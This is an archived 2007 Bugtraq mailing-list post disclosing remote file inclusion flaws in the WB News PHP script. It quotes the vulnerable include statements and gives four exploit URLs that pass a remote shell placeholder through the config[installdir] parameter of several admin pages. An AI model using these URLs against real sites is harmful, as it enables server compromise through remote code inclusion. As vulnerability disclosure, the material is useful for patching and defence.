| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070301165429.27973.qmail@securityfocus.com>
Date: 1 Mar 2007 16:54:29 -0000
From: mostafa_ragab@....com
To: bugtraq@...urityfocus.com
Subject: WB News Remote File Include in all versions
ThE bug in admin file
*******************************************************************************
>>To ConTacT mE @ www.Asb-May.net/bb
>>ScRiPtS:-http://www.webmobo.com/wbnews/download.html
>>GrEaTz To:-ToOofa-HaCk.eGy (All AsB-MaY DisCoverY ExPloIts GrOup)
>>Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP} >>
******************************************************************************
>>comment.php:-
>>include $config['installdir']. "/includes/function.php";
>>themes.php:-
>>include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php";
>>directory.php:-
>>include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php";
>>sendmsg:-
>>include $config['installdir']."/templates/".$them['THEME_DIRECTORY']."/admin/theme_info.php";
*******************************************************************************
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/comment.php?config[installdir]=[Shell]
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/themes.php?config[installdir]=[Shell]
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/directory.php?config[installdir]=[Shell]
>>ExPlOiT:-http://www.SitE.*/[WBNewSPaTh]/admin/sendmsg.php?config[installdir]=[Shell]
*******************************************************************************
Powered by blists - more mailing lists